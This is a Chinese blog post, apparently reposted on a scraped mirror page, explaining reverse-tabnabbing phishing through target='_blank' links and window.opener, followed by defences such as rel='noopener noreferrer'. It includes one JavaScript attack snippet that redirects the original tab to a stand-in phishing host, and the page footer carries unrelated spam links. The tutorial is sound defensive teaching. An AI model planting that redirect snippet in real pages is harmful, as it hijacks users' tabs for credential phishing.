你不曾察覺的隱患：危險(xiǎn)的 target="_blank" 與 “opener”

venmos 發(fā)布于2019-08-02 16:05 / 2618人閱讀

摘要：惡意網(wǎng)站根據(jù)來偽造一個(gè)足以欺騙用戶的頁面，并展示出來期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性。而如果在鏈接中加入了，則此時(shí)兩個(gè)標(biāo)簽頁將會(huì)互不干擾，使得原頁面的性能不會(huì)受到新頁面的影響。

在網(wǎng)頁中使用鏈接時(shí)，如果想要讓瀏覽器自動(dòng)在新的標(biāo)簽頁打開指定的地址，通常的做法就是在 a 標(biāo)簽上添加 target等于"_blank" 屬性。
然而，就是這個(gè)屬性，為釣魚攻擊者帶來了可乘之機(jī)。

起源 parent 與 opener

在說 opener 之前，可以先聊聊 </b> 中的 <b>parent</b>。</p> <p>我們知道，在 <b><iframe></b> 中提供了一個(gè)用于父子頁面交互的對象，叫做 <b>window.parent</b>，我們可以通過 <b>window.parent</b> 對象來從框架中的頁面訪問父級頁面的 <b>window</b>。</p> <p><b>opener</b> 與 <b>parent</b> 一樣，只不過是用于 <b><a target="_blank"></b> 在新標(biāo)簽頁打開的頁面的。通過 <b><a target="_blank"></b> 打開的頁面，可以直接使用 <b>window.opener</b> 來訪問來源頁面的 <b>window</b> 對象。</p> <b>同域與跨域</b> <p>瀏覽器提供了完整的跨域保護(hù)，在域名相同時(shí)，<b>parent</b> 對象和 <b>opener</b> 對象實(shí)際上就直接是上一級的 <b>window</b> 對象；而當(dāng)域名不同時(shí)，<b>parent</b> 和 <b>opener</b> 則是經(jīng)過包裝的一個(gè) <b>global</b> 對象。這個(gè) <b>global</b> 對象僅提供非常有限的屬性訪問，并且在這僅有的幾個(gè)屬性中，大部分也都是不允許訪問的（訪問會(huì)直接拋出 <b>DOMException</b>）。</p> <p><script type="text/javascript">showImg("https://segmentfault.com/img/bVbg33S?w=729&h=42");</script></p> <p><script type="text/javascript">showImg("https://segmentfault.com/img/bVbg33T?w=729&h=42");</script></p> <p>在 <b><iframe></b> 中，提供了一個(gè) <b>sandbox</b> 屬性用于控制框架中的頁面的權(quán)限，因此即使是同域，也可以控制 <b><iframe></b> 的安全性。</p> <b>利用</b> <p>如果，你的網(wǎng)站上有一個(gè)鏈接，使用了 <b>target="_blank"</b>，那么一旦用戶點(diǎn)擊這個(gè)鏈接并進(jìn)入一個(gè)新的標(biāo)簽，新標(biāo)簽中的頁面如果存在惡意代碼，就可以將你的網(wǎng)站直接導(dǎo)航到一個(gè)虛假網(wǎng)站。此時(shí)，如果用戶回到你的標(biāo)簽頁，看到的就是被替換過的頁面了。</p> <b>詳細(xì)步驟</b> <p> <p>在你的網(wǎng)站 <b>https://example.com</b> 上存在一個(gè)鏈接：</p> <pre><a target="_blank">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> </p> <p> <p>用戶點(diǎn)擊了這個(gè)鏈接，在新的標(biāo)簽頁打開了這個(gè)網(wǎng)站。這個(gè)網(wǎng)站可以通過 HTTP Header 中的 <b>Referer</b> 屬性來判斷用戶的來源。</p> <p>并且，這個(gè)網(wǎng)站上包含著類似于這樣的 JavaScript 代碼：</p> <pre>const url = encodeURIComponent("{{header.referer}}"); window.opener.location.replace("https://a.fake.site/?" + url);</pre> </p> <p>此時(shí)，用戶在繼續(xù)瀏覽這個(gè)新的標(biāo)簽頁，而原來的網(wǎng)站所在的標(biāo)簽頁此時(shí)已經(jīng)被導(dǎo)航到了 <b>https://a.fake.site/?https%3A%2F%2Fexample.com%2F</b>。</p> <p>惡意網(wǎng)站 <b>https://a.fake.site</b> 根據(jù) Query String 來偽造一個(gè)足以欺騙用戶的頁面，并展示出來（期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性）。</p> <p>用戶關(guān)閉 <b>https://an.evil.site</b> 的標(biāo)簽頁，回到原來的網(wǎng)站………………已經(jīng)回不去了。</p> <pre>上面的攻擊步驟是在跨域的情況下的，在跨域情況下，<b>opener</b> 對象和 <b>parent</b> 一樣，是受到限制的，僅提供非常有限的屬性訪問，并且在這僅有的幾個(gè)屬性中，大部分也都是不允許訪問的（訪問會(huì)直接拋出 <b>DOMException</b>）。<p>但是與 <b>parent</b> 不同的是，<strong>在跨域的情況下，<b>opener</b> 仍然可以調(diào)用 <b>location.replace</b> 方法</strong>而 <b>parent</b> 則不可以。</p> <p>如果是在同域的情況下（比如一個(gè)網(wǎng)站上的某一個(gè)頁面被植入了惡意代碼），則情況要比上面嚴(yán)重得多。</p> </pre> <b>防御</b> <p><b><iframe></b> 中有 <b>sandbox</b> 屬性，而鏈接，則可以使用下面的辦法：</p> <b>1. Referrer Policy 和 noreferrer</b> <p>上面的攻擊步驟中，用到了 HTTP Header 中的 <b>Referer</b> 屬性，實(shí)際上可以在 HTTP 的響應(yīng)頭中增加 <b>Referrer Policy</b> 頭來保證來源隱私安全。</p> <p><b>Referrer Policy</b> 需要修改后端代碼來實(shí)現(xiàn)，而在前端，也可以使用 <b><a></b> 標(biāo)簽的 <b>rel</b> 屬性來指定 <b>rel="noreferrer"</b> 來保證來源隱私安全。</p> <pre><a target="_blank" rel="noreferrer">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> <pre>但是要注意的是：即使限制了 <b>referer</b> 的傳遞，仍然不能阻止原標(biāo)簽被惡意跳轉(zhuǎn)。</pre> <b>2. noopener</b> <p>為了安全，現(xiàn)代瀏覽器都支持在 <b><a></b> 標(biāo)簽的 <b>rel</b> 屬性中指定 <b>rel="noopener"</b>，這樣，在打開的新標(biāo)簽頁中，將無法再使用 <b>opener</b> 對象了，它為設(shè)置為了 <b>null</b>。</p> <pre><a target="_blank" rel="noopener">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> <b>3. JavaScript</b> <p><b>noopener</b> 屬性看似是解決了所有問題，但是...瀏覽器的兼容性問題...</p> <p><script type="text/javascript">showImg("https://segmentfault.com/img/bVbg33Y?w=1200&h=814");</script></p> <p>可以看到，現(xiàn)在絕大多數(shù)瀏覽器都已經(jīng)兼容了 <b>rel="noopener"</b> 屬性了。但是，為了保護(hù)稍舊的“近代”瀏覽器或是很舊的“古代”瀏覽器甚至是“遠(yuǎn)古”瀏覽器，只有 <b>noopener</b> 屬性還是遠(yuǎn)遠(yuǎn)不夠的。</p> <p>這時(shí)，就只能請出下面這段原生 JavaScript 來幫忙了。</p> <pre>"use strict"; function openUrl(url) { var newTab = window.open(); newTab.opener = null; newTab.location = url; }</pre> <b>推薦</b> <p>首先，在網(wǎng)站中的鏈接上，如果使用了 <b>target="_blank"</b>，就要帶上 <b>rel="noopener"</b>，并且建議帶上 <b>rel="noreferrer"</b>。類似于這樣：</p> <pre><a target="_blank" rel="noopener noreferrer">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> <p>當(dāng)然，在跳轉(zhuǎn)到第三方網(wǎng)站的時(shí)候，為了 SEO 權(quán)重，還建議帶上 <b>rel="nofollow"</b>，所以最終類似于這樣：</p> <pre><a target="_blank" rel="noopener noreferrer nofollow">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a></pre> <b>性能</b> <p>最后，再來說說性能問題。</p> <p>如果網(wǎng)站使用了 <b><a target="_blank"></b>，那么新打開的標(biāo)簽頁的性能將會(huì)影響到當(dāng)前頁面。此時(shí)如果新打開的頁面中執(zhí)行了一個(gè)非常龐大的 JavaScript 腳本，那么原始標(biāo)簽頁也會(huì)受到影響，會(huì)出現(xiàn)卡頓的現(xiàn)象（當(dāng)然不至于卡死）。</p> <p>而如果在鏈接中加入了 <b>noopener</b>，則此時(shí)兩個(gè)標(biāo)簽頁將會(huì)互不干擾，使得原頁面的性能不會(huì)受到新頁面的影響。</p> <hr> <pre>文 / jinliming2<br>一條對新鮮事物充滿了好奇心的咸魚<p>編 / 熒聲</p> </pre> <p>本文已由作者授權(quán)發(fā)布，版權(quán)屬于創(chuàng)宇前端。歡迎注明出處轉(zhuǎn)載本文。本文鏈接：https://knownsec-fed.com/2018...</p> <p>想要訂閱更多來自知道創(chuàng)宇開發(fā)一線的分享，請搜索關(guān)注我們的微信公眾號：創(chuàng)宇前端（KnownsecFED）。歡迎留言討論，我們會(huì)盡可能回復(fù)。</p> <p><script type="text/javascript">showImg("https://segmentfault.com/img/bVbgVle?w=296&h=295");</script></p> <p>歡迎點(diǎn)贊、收藏、留言評論、轉(zhuǎn)發(fā)分享和打賞支持我們。打賞將被完全轉(zhuǎn)交給文章作者。</p> <p>感謝您的閱讀。</p> </div> <div id="g2ga2gi" class="mt-64 tags-seach" > <div id="isekymm" class="tags-info"> <a style="width:120px;" title="云服務(wù)器" href="http://m.specialneedsforspecialkids.com/site/active/kuaijiesale.html?ytag=seo">云服務(wù)器</a> <a style="width:120px;" title="GPU云服務(wù)器" href="http://m.specialneedsforspecialkids.com/site/product/gpu.html">GPU云服務(wù)器</a> <a style="width:120px;" title="target_blank" href="http://m.specialneedsforspecialkids.com/yun/tag/target_blank/">target_blank</a> <a style="width:120px;" title="Quote" href="http://m.specialneedsforspecialkids.com/yun/tag/Quote/">Quote</a> <a style="width:120px;" title="quoted" href="http://m.specialneedsforspecialkids.com/yun/tag/quoted/">quoted</a> <a style="width:120px;" title="quot" href="http://m.specialneedsforspecialkids.com/yun/tag/quot/">quot</a> </div> </div> <div id="eiycsoo" class="entry-copyright mb-30"> <p class="mb-15"> 文章版權(quán)歸作者所有，未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為，您可以聯(lián)系管理員刪除。</p> <p>轉(zhuǎn)載請注明本文地址：http://m.specialneedsforspecialkids.com/yun/54653.html</p> </div> <ul class="pre-next-page"> <li id="2ms0yu0" class="ellipsis"><a class="hpf" href="http://m.specialneedsforspecialkids.com/yun/54652.html">上一篇：Slog65_項(xiàng)目上線之ArthurSlog個(gè)人網(wǎng)站上線4</a></li> <li id="eme2oam" class="ellipsis"><a class="hpf" href="http://m.specialneedsforspecialkids.com/yun/54654.html">下一篇：前端每日實(shí)戰(zhàn)：137# 視頻演示如何用純 CSS 創(chuàng)作一個(gè)抽象的水波蕩漾的動(dòng)畫</a></li> </ul> </div> <div id="0mmsmwm" class="about_topicone-mid"> <h3 class="top-com-title mb-0"><span data-id="0">相關(guān)文章</span></h3> <ul class="com_white-left-mid atricle-list-box"> <li> <div id="yqsaeqo" class="atricle-list-right"> <h2 class="ellipsis2"><a class="hpf" href="http://m.specialneedsforspecialkids.com/yun/97826.html"><b><em>你</em><em>不曾</em><em>察覺</em><em>的</em><em>隱患</em>：<em>危險(xiǎn)</em><em>的</em> <em>target</em>=&<em>quot</em>;<em>_</em><em>blank</em>&<em>quot</em>; <em>與</em> “<em>opener</em>”</b></a></h2> <p class="ellipsis2 good">摘要：惡意網(wǎng)站根據(jù)來偽造一個(gè)足以欺騙用戶的頁面，并展示出來期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性。而如果在鏈接中加入了，則此時(shí)兩個(gè)標(biāo)簽頁將會(huì)互不干擾，使得原頁面的性能不會(huì)受到新頁面的影響。在網(wǎng)頁中使用鏈接時(shí)，如果想要讓瀏覽器自動(dòng)在新的標(biāo)簽頁打開指定的地址，通常的做法就是在 a 標(biāo)簽上添加 target等于_blank 屬性。然而，就是這個(gè)屬性，為釣魚攻擊者帶來了可乘之機(jī)。 s...</p> <div id="eagyqsg" class="com_white-left-info"> <div id="ssyoggu" class="com_white-left-infol"> <a href="http://m.specialneedsforspecialkids.com/yun/u-493.html"><img src="http://m.specialneedsforspecialkids.com/yun/data/avatar/000/00/04/small_000000493.jpg" alt=""><span id="uwyagee" class="layui-hide64">EsgynChina</span></a> <time datetime="">2019-08-23 12:00</time> <span><i class="fa fa-commenting"></i>評論0</span> <span><i class="fa fa-star"></i>收藏0</span> </div> </div> </div> </li> <li> <div id="g2u0yyi" class="atricle-list-right"> <h2 class="ellipsis2"><a class="hpf" href="http://m.specialneedsforspecialkids.com/yun/11421.html"><b><em>你</em><em>不曾</em><em>察覺</em><em>的</em><em>隱患</em>：<em>危險(xiǎn)</em><em>的</em> <em>target</em>=&<em>quot</em>;<em>_</em><em>blank</em>&<em>quot</em>; <em>與</em> “<em>opener</em>”</b></a></h2> <p class="ellipsis2 good">摘要：惡意網(wǎng)站根據(jù)來偽造一個(gè)足以欺騙用戶的頁面，并展示出來期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性。而如果在鏈接中加入了，則此時(shí)兩個(gè)標(biāo)簽頁將會(huì)互不干擾，使得原頁面的性能不會(huì)受到新頁面的影響。在網(wǎng)頁中使用鏈接時(shí)，如果想要讓瀏覽器自動(dòng)在新的標(biāo)簽頁打開指定的地址，通常的做法就是在 a 標(biāo)簽上添加 target等于_blank 屬性。然而，就是這個(gè)屬性，為釣魚攻擊者帶來了可乘之機(jī)。 s...</p> <div id="iigaqee" class="com_white-left-info"> <div id="mkycusa" class="com_white-left-infol"> <a href="http://m.specialneedsforspecialkids.com/yun/u-522.html"><img src="http://m.specialneedsforspecialkids.com/yun/data/avatar/000/00/05/small_000000522.jpg" alt=""><span id="wc2weg0" class="layui-hide64">jackwang</span></a> <time datetime="">2019-06-21 16:49</time> <span><i class="fa fa-commenting"></i>評論0</span> <span><i class="fa fa-star"></i>收藏0</span> </div> </div> </div> </li> <li> <div id="m2iyccq" class="atricle-list-right"> <h2 class="ellipsis2"><a class="hpf" href="http://m.specialneedsforspecialkids.com/yun/114679.html"><b>優(yōu)秀博文收藏（不定期更新）</b></a></h2> <p class="ellipsis2 good">摘要：我的書簽我的書簽謹(jǐn)慎導(dǎo)入，小心覆蓋工具類版本管理快速切換源配置教程指南可視化工具前端工具集前端助手網(wǎng)絡(luò)封包截取工具格式化工具標(biāo)注工具模擬請求類深入淺出布局你所不知道的動(dòng)畫技巧與細(xì)節(jié)常用代碼黑魔法小技巧，讓你少寫不必要的，代碼更優(yōu)雅一勞永我的書簽我的書簽（謹(jǐn)慎導(dǎo)入，小心覆蓋）工具類 nvm: node版本管理 nrm: 快速切換npm源 shell: zsh+on-my-zsh配...</p> <div id="02g0y2o" class="com_white-left-info"> <div id="u22ewym" class="com_white-left-infol"> <a href="http://m.specialneedsforspecialkids.com/yun/u-191.html"><img src="http://m.specialneedsforspecialkids.com/yun/data/avatar/000/00/01/small_000000191.jpg" alt=""><span id="qckag0y" class="layui-hide64">zhangfaliang</span></a> <time datetime="">2019-08-30 10:57</time> <span><i class="fa fa-commenting"></i>評論0</span> <span><i class="fa fa-star"></i>收藏0</span> </div> </div> </div> </li> <li> <div id="0yeg00u" class="atricle-list-right"> <h2 class="ellipsis2"><a class="hpf" href="http://m.specialneedsforspecialkids.com/yun/109770.html"><b>優(yōu)秀博文收藏（不定期更新）</b></a></h2> <p class="ellipsis2 good">摘要：我的書簽我的書簽謹(jǐn)慎導(dǎo)入，小心覆蓋工具類版本管理快速切換源配置教程指南可視化工具前端工具集前端助手網(wǎng)絡(luò)封包截取工具格式化工具標(biāo)注工具模擬請求類深入淺出布局你所不知道的動(dòng)畫技巧與細(xì)節(jié)常用代碼黑魔法小技巧，讓你少寫不必要的，代碼更優(yōu)雅一勞永我的書簽我的書簽（謹(jǐn)慎導(dǎo)入，小心覆蓋）工具類 nvm: node版本管理 nrm: 快速切換npm源 shell: zsh+on-my-zsh配...</p> <div id="sgyo0ee" class="com_white-left-info"> <div id="gq0gymy" class="com_white-left-infol"> <a href="http://m.specialneedsforspecialkids.com/yun/u-1105.html"><img src="http://m.specialneedsforspecialkids.com/yun/data/avatar/000/00/11/small_000001105.jpg" alt=""><span id="wiogky2" class="layui-hide64">sunsmell</span></a> <time datetime="">2019-08-26 13:54</time> <span><i class="fa fa-commenting"></i>評論0</span> <span><i class="fa fa-star"></i>收藏0</span> </div> </div> </div> </li> </ul> </div> <div id="m2uiayk" class="topicone-box-wangeditor"> <h3 class="top-com-title mb-64"><span>發(fā)表評論</span></h3> <div id="gq0oso2" class="xcp-publish-main flex_box_zd"> <div id="e0ioseu" class="unlogin-pinglun-box"> <a href="javascript:login()" class="grad">登陸后可評論</a> </div> </div> </div> <div id="i0csiis" class="site-box-content"> <div id="eu0e2gk" class="site-content-title"> <h3 class="top-com-title mb-64"><span>0條評論</span></h3> </div> <div id="c2mowyk" class="pages"></ul></div> </div> </div> <div id="ocwk2aa" class="layui-col-md4 layui-col-lg3 com_white-right site-wrap-right"> <div id="uioqmm0" class=""> <div id="ugacik0" class="com_layuiright-box user-msgbox"> <a href="http://m.specialneedsforspecialkids.com/yun/u-294.html"><img src="http://m.specialneedsforspecialkids.com/yun/data/avatar/000/00/02/small_000000294.jpg" alt=""></a> <h3><a href="http://m.specialneedsforspecialkids.com/yun/u-294.html" rel="nofollow">venmos</a></h3> <h6>男<span>|</span>高級講師</h6> <div id="yaqmgg0" class="flex_box_zd user-msgbox-atten"> <a href="javascript:attentto_user(294)" id="attenttouser_294" class="grad follow-btn notfollow attention">我要關(guān)注</a> <a href="javascript:login()" title="發(fā)私信" >我要私信</a> </div> <div id="yme2ayk" class="user-msgbox-list flex_box_zd"> <h3 class="hpf">TA的文章</h3> <a href="http://m.specialneedsforspecialkids.com/yun/ut-294.html" class="box_hxjz">閱讀更多</a> </div> <ul class="user-msgbox-ul"> <li><h3 class="ellipsis"><a href="http://m.specialneedsforspecialkids.com/yun/122800.html">歐路云：狂歡雙11，新上美國OVH美西AMD Epyc? 3.1主頻 / 自帶500DDOS 防護(hù)，</a></h3> <p>閱讀 2095<span>·</span>2021-11-02 14:48</p></li> <li><h3 class="ellipsis"><a href="http://m.specialneedsforspecialkids.com/yun/115938.html">CSS基礎(chǔ)-background的那些屬性</a></h3> <p>閱讀 2772<span>·</span>2019-08-30 14:19</p></li> <li><h3 class="ellipsis"><a href="http://m.specialneedsforspecialkids.com/yun/115470.html">2016百度前端技術(shù)學(xué)院Task02</a></h3> <p>閱讀 2940<span>·</span>2019-08-30 13:19</p></li> <li><h3 class="ellipsis"><a href="http://m.specialneedsforspecialkids.com/yun/113653.html">vue.js使用echarts一分鐘簡單入門</a></h3> <p>閱讀 1308<span>·</span>2019-08-29 16:17</p></li> <li><h3 class="ellipsis"><a href="http://m.specialneedsforspecialkids.com/yun/110015.html">G6文檔</a></h3> <p>閱讀 3246<span>·</span>2019-08-26 14:05</p></li> <li><h3 class="ellipsis"><a href="http://m.specialneedsforspecialkids.com/yun/109937.html">JS設(shè)計(jì)模式學(xué)習(xí)_基礎(chǔ)篇</a></h3> <p>閱讀 3000<span>·</span>2019-08-26 13:58</p></li> <li><h3 class="ellipsis"><a href="http://m.specialneedsforspecialkids.com/yun/104774.html">手寫一個(gè)符合promise/A+規(guī)范的promise庫</a></h3> <p>閱讀 3087<span>·</span>2019-08-23 18:10</p></li> <li><h3 class="ellipsis"><a href="http://m.specialneedsforspecialkids.com/yun/104611.html">typescript 高級技巧</a></h3> <p>閱讀 1114<span>·</span>2019-08-23 18:04</p></li> </ul> </div>  <div id="02aouiy" class="com_layuiright-box"> <h6 class="top-com-title"><span>最新活動(dòng)</span></h6> <div id="iqsuoeq" class="com_adbox"> <div id="iw0k22k" class="layui-carousel" id="right-item"> <div carousel-item> <div> <a href="http://m.specialneedsforspecialkids.com/site/active/kuaijiesale.html?ytag=seo" rel="nofollow"> <img src="http://m.specialneedsforspecialkids.com/yun/data/attach/240625/2rTjEHmi.png" alt="云服務(wù)器"> </a> </div> <div> <a href="http://m.specialneedsforspecialkids.com/site/product/gpu.html" rel="nofollow"> <img src="http://m.specialneedsforspecialkids.com/yun/data/attach/240807/7NjZjdrd.png" alt="GPU云服務(wù)器"> </a> </div> </div> </div> </div>  <div id="ck2oaaa" class="adhtml"> </div> <script> $(function(){ $.ajax({ type: "GET", url:"http://m.specialneedsforspecialkids.com/yun/ad/getad/1.html", cache: false, success: function(text){ $(".adhtml").html(text); } }); }) </script> </div> </div> </div> </div> </div> </section>  <div id="u20gaac" class="site-tree-mobile layui-hide"> <i class="layui-icon layui-icon-spread-left"></i> </div>  <div id="2g0giww" class="site-mobile-shade"></div>  <div class="mw0ciuq" id="payread"> <div id="uskkeca" class="layui-form-item">閱讀需要支付1元查看</div> <div id="2yaaooc" class="layui-form-item"><button class="btn-right">支付并查看</button></div> </div> <script> var prei=0; $(".site-seo-depict pre").each(function(){ var html=$(this).html().replace("<code>","").replace("</code>","").replace('<code class="javascript hljs" codemark="1">',''); $(this).attr('data-clipboard-text',html).attr("id","pre"+prei); $(this).html("").append("<code>"+html+"</code>"); prei++; }) $(".site-seo-depict img").each(function(){ if($(this).attr("src").indexOf('data:image/svg+xml')!= -1){ $(this).remove(); } }) $("LINK[href*='style-49037e4d27.css']").remove(); $("LINK[href*='markdown_views-d7a94ec6ab.css']").remove(); layui.use(['jquery', 'layer','code'], function(){ $("pre").attr("class","layui-code"); $("pre").attr("lay-title",""); $("pre").attr("lay-skin",""); layui.code(); $(".layui-code-h3 a").attr("class","copycode").html("復(fù)制代碼 ").attr("onclick","copycode(this)"); }); function copycode(target){ var id=$(target).parent().parent().attr("id"); var clipboard = new ClipboardJS("#"+id); clipboard.on('success', function(e) { e.clearSelection(); alert("復(fù)制成功") }); clipboard.on('error', function(e) { alert("復(fù)制失敗") }); } //$(".site-seo-depict").html($(".site-seo-depict").html().slice(0, -5)); </script> <link rel="stylesheet" type="text/css" href="http://m.specialneedsforspecialkids.com/yun/static/js/neweditor/code/styles/tomorrow-night-eighties.css"> <script src="http://m.specialneedsforspecialkids.com/yun/static/js/neweditor/code/highlight.pack.js" type="text/javascript"></script> <script src="http://m.specialneedsforspecialkids.com/yun/static/js/clipboard.js"></script> <script>hljs.initHighlightingOnLoad();</script> <script> function setcode(){ var _html=''; document.querySelectorAll('pre code').forEach((block) => { var _tmptext=$.trim($(block).text()); if(_tmptext!=''){ _html=_html+_tmptext; console.log(_html); } }); } </script> <script> function payread(){ layer.open({ type: 1, title:"付費(fèi)閱讀", shadeClose: true, content: $('#payread') }); } // 舉報(bào) function jupao_tip(){ layer.open({ type: 1, title:false, shadeClose: true, content: $('#jubao') }); } $(".getcommentlist").click(function(){ var _id=$(this).attr("dataid"); var _tid=$(this).attr("datatid"); $("#articlecommentlist"+_id).toggleClass("hide"); var flag=$("#articlecommentlist"+_id).attr("dataflag"); if(flag==1){ flag=0; }else{ flag=1; //加載評論 loadarticlecommentlist(_id,_tid); } $("#articlecommentlist"+_id).attr("dataflag",flag); }) $(".add-comment-btn").click(function(){ var _id=$(this).attr("dataid"); $(".formcomment"+_id).toggleClass("hide"); }) $(".btn-sendartcomment").click(function(){ var _aid=$(this).attr("dataid"); var _tid=$(this).attr("datatid"); var _content=$.trim($(".commenttext"+_aid).val()); if(_content==''){ alert("評論內(nèi)容不能為空"); return false; } var touid=$("#btnsendcomment"+_aid).attr("touid"); if(touid==null){ touid=0; } addarticlecomment(_tid,_aid,_content,touid); }) $(".button_agree").click(function(){ var supportobj = $(this); var tid = $(this).attr("id"); $.ajax({ type: "GET", url:"http://m.specialneedsforspecialkids.com/yun/index.php?topic/ajaxhassupport/" + tid, cache: false, success: function(hassupport){ if (hassupport != '1'){ $.ajax({ type: "GET", cache:false, url: "http://m.specialneedsforspecialkids.com/yun/index.php?topic/ajaxaddsupport/" + tid, success: function(comments) { supportobj.find("span").html(comments+"人贊"); } }); }else{ alert("您已經(jīng)贊過"); } } }); }); function attenquestion(_tid,_rs){ $.ajax({ //提交數(shù)據(jù)的類型 POST GET type:"POST", //提交的網(wǎng)址 url:"http://m.specialneedsforspecialkids.com/yun/favorite/topicadd.html", //提交的數(shù)據(jù) data:{tid:_tid,rs:_rs}, //返回?cái)?shù)據(jù)的格式 datatype: "json",//"xml", "html", "script", "json", "jsonp", "text". //在請求之前調(diào)用的函數(shù) beforeSend:function(){}, //成功返回之后調(diào)用的函數(shù) success:function(data){ var data=eval("("+data+")"); console.log(data) if(data.code==2000){ layer.msg(data.msg,function(){ if(data.rs==1){ //取消收藏 $(".layui-layer-tips").attr("data-tips","收藏文章"); $(".layui-layer-tips").html('<i class="fa fa-heart-o"></i>'); } if(data.rs==0){ //收藏成功 $(".layui-layer-tips").attr("data-tips","已收藏文章"); $(".layui-layer-tips").html('<i class="fa fa-heart"></i>') } }) }else{ layer.msg(data.msg) } } , //調(diào)用執(zhí)行后調(diào)用的函數(shù) complete: function(XMLHttpRequest, textStatus){ postadopt=true; }, //調(diào)用出錯(cuò)執(zhí)行的函數(shù) error: function(){ //請求出錯(cuò)處理 postadopt=false; } }); } </script> <footer> <div id="2022ooe" class="layui-container"> <div id="uquwaaa" class="flex_box_zd"> <div id="2gymseu" class="left-footer"> <h6><a href="http://m.specialneedsforspecialkids.com/"><img src="http://m.specialneedsforspecialkids.com/yun/static/theme/ukd//images/logo.png" alt="UCloud （優(yōu)刻得科技股份有限公司）"></a></h6> <p>UCloud （優(yōu)刻得科技股份有限公司）是中立、安全的云計(jì)算服務(wù)平臺，堅(jiān)持中立，不涉足客戶業(yè)務(wù)領(lǐng)域。公司自主研發(fā)IaaS、PaaS、大數(shù)據(jù)流通平臺、AI服務(wù)平臺等一系列云計(jì)算產(chǎn)品，并深入了解互聯(lián)網(wǎng)、傳統(tǒng)企業(yè)在不同場景下的業(yè)務(wù)需求，提供公有云、混合云、私有云、專有云在內(nèi)的綜合性行業(yè)解決方案。</p> </div> <div id="cagumy2" class="right-footer layui-hidemd"> <ul class="flex_box_zd"> <li> <h6>UCloud與云服務(wù)</h6> <p><a href="http://m.specialneedsforspecialkids.com/site/about/intro/">公司介紹</a></p> <p><a >加入我們</a></p> <p><a href="http://m.specialneedsforspecialkids.com/site/ucan/onlineclass/">UCan線上公開課</a></p> <p><a href="http://m.specialneedsforspecialkids.com/site/solutions.html" >行業(yè)解決方案</a></p> <p><a href="http://m.specialneedsforspecialkids.com/site/pro-notice/">產(chǎn)品動(dòng)態(tài)</a></p> </li> <li> <h6>友情鏈接</h6> <p><a >GPU算力平臺</a></p> <p><a >UCloud私有云</a></p> <p><a >SurferCloud</a></p> <p><a >工廠仿真軟件</a></p> <p><a >Pinex</a></p> <p><a >AI繪畫</a></p> </li> <li> <h6>社區(qū)欄目</h6> <p><a href="http://m.specialneedsforspecialkids.com/yun/column/index.html">專欄文章</a></p> <p><a href="http://m.specialneedsforspecialkids.com/yun/udata/">專題地圖</a></p> </li> <li> <h6>常見問題</h6> <p><a href="http://m.specialneedsforspecialkids.com/site/ucsafe/notice.html" >安全中心</a></p> <p><a href="http://m.specialneedsforspecialkids.com/site/about/news/recent/" >新聞動(dòng)態(tài)</a></p> <p><a href="http://m.specialneedsforspecialkids.com/site/about/news/report/">媒體動(dòng)態(tài)</a></p> <p><a href="http://m.specialneedsforspecialkids.com/site/cases.html">客戶案例</a></p> <p><a href="http://m.specialneedsforspecialkids.com/site/notice/">公告</a></p> </li> <li> <span><img src="https://static.ucloud.cn/7a4b6983f4b94bcb97380adc5d073865.png" alt="優(yōu)刻得"></span> <p>掃掃了解更多</p></div> </div> <div id="okoemiw" class="copyright">Copyright ? 2012-2023 UCloud 優(yōu)刻得科技股份有限公司<i>｜</i><a rel="nofollow" >滬公網(wǎng)安備 31011002000058號</a><i>｜</i><a rel="nofollow" ></a> 滬ICP備12020087號-3</a><i>｜</i> <script type="text/javascript" src="https://gyfk12.kuaishang.cn/bs/ks.j?cI=197688&fI=125915" charset="utf-8"></script> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?290c2650b305fc9fff0dbdcafe48b59d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script>  <script async src="https://www.googletagmanager.com/gtag/js?id=G-DZSMXQ3P9N"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-DZSMXQ3P9N'); </script> <script> (function(){ var el = document.createElement("script"); el.src = "https://lf1-cdn-tos.bytegoofy.com/goofy/ttzz/push.js?99f50ea166557aed914eb4a66a7a70a4709cbb98a54ecb576877d99556fb4bfc3d72cd14f8a76432df3935ab77ec54f830517b3cb210f7fd334f50ccb772134a"; el.id = "ttzz"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(el, s); })(window) </script></div> </div> </footer> <footer> <div class="friendship-link"> <p>感谢您访问我们的网站，您可能还对以下资源感兴趣：</p> <a href="http://m.specialneedsforspecialkids.com/" title="国产xxxx99真实实拍">国产xxxx99真实实拍</a> <div class="friend-links"> <a href="http://m.cp97744.com/">国产一区电影</a> </div> </div> </footer> <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </body><div id="2qko0" class="pl_css_ganrao" style="display: none;"><tr id="2qko0"><wbr id="2qko0"><cite id="2qko0"></cite></wbr></tr><input id="2qko0"></input><td id="2qko0"></td><cite id="2qko0"></cite><button id="2qko0"><samp id="2qko0"><tbody id="2qko0"></tbody></samp></button><sup id="2qko0"></sup><noframes id="2qko0"></noframes><nav id="2qko0"></nav><td id="2qko0"></td><td id="2qko0"></td><tr id="2qko0"></tr><kbd id="2qko0"></kbd><code id="2qko0"></code><input id="2qko0"></input><abbr id="2qko0"></abbr><ul id="2qko0"></ul><pre id="2qko0"></pre><center id="2qko0"></center><li id="2qko0"><button id="2qko0"><dd id="2qko0"></dd></button></li><center id="2qko0"></center><abbr id="2qko0"><kbd id="2qko0"><pre id="2qko0"></pre></kbd></abbr><rt 